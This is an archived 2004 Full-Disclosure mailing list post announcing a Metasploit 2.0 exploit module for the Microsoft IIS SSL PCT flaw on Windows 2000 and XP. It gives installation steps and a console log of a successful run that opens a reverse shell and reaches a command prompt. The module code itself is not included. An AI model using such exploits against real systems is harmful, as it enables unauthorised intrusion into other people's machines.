[Full-Disclosure] Metasploit Microsoft IIS SSL PCT Module

From: H D Moore (fdlist_at_digitaloffense.net)
Date: 04/24/04

  • Next message: Orchestra: "[Full-Disclosure] Que es mas macho, SCRIPTES o TABLESPOON?"
    To: <full-disclosure@lists.netsys.com>
    Date: Sat, 24 Apr 2004 05:19:04 -0500
    
    
    

    Attached is an exploit module for version 2.0 of the Metasploit
    Framework. This module was based on Johnny Cyberpunk's code and includes
    some interesting improvements:

    - Targets for Windows 2000 and Windows XP
    - SSL request modified to allow exploitation on Windows XP
    - Use of ExitThread allows repeatable exploitation
    - Shellcode is limited to 1800 bytes or so...

    To use this module, copy the attached file into the "exploits"
    subdirectory of the Metasploit Framework 2.0 installation. Win32 users
    should copy this file into $BASE\home\framework-2.0\exploits, where $BASE
    is where you installed the Framework.

    If for some reason you don't have the Metasploit Framework installed, grab
    it from the following URL:

    http://metasploit.com/projects/Framework/

    If you specify the wrong offset, LSASS will stop functioning (but not
    crash!), so make sure you know your targets. This module has been tested
    against most Windows 2000 and Windows XP versions (English only, sorry).

    Cheers,

    HD and spoonm

    ______________________________________
    msf iis5x_ssl_pct(winreverse_stg) > exploit
    [*] Starting Reverse Handler.
    [*] Attempting to exploit target Windows XP SP1
    [*] Sending 329 bytes to remote host.
    [*] Waiting for a response...
    [*] Got connection from 192.168.50.98:1038
    [*] Sending Stage (115 bytes)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html



  • Next message: Orchestra: "[Full-Disclosure] Que es mas macho, SCRIPTES o TABLESPOON?"

    Relevant Pages

    • Re: [Full-disclosure] Metasploit Framework v3.1 Released
      ... New Version of Attack Framework Ready to Pwn ... full support for the Windows ... Doomen like the last time Metasploit was released. ... Development of this interface was ...
      (Full-Disclosure)
    • [Full-disclosure] Metasploit Framework v3.1 Released
      ... METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK ... full support for the Windows ... The graphical user interface is a major step forward for Metasploit ...
      (Full-Disclosure)
    • Metasploit Framework v3.1 Released
      ... METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK ... full support for the Windows ... The graphical user interface is a major step forward for Metasploit ...
      (Pen-Test)
    • Metasploit Framework v3.1 Released
      ... METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK ... full support for the Windows ... The graphical user interface is a major step forward for Metasploit ...
      (Bugtraq)
    • Re: May I use Office 2003 pro instead of Office 2007 pro?
      ... You can try Framework from www.framework.com which is good alternate to ... Framework's outlined windowing environment with word processing, ... transparent compatibility with Windows programs and data. ...
      (microsoft.public.office.misc)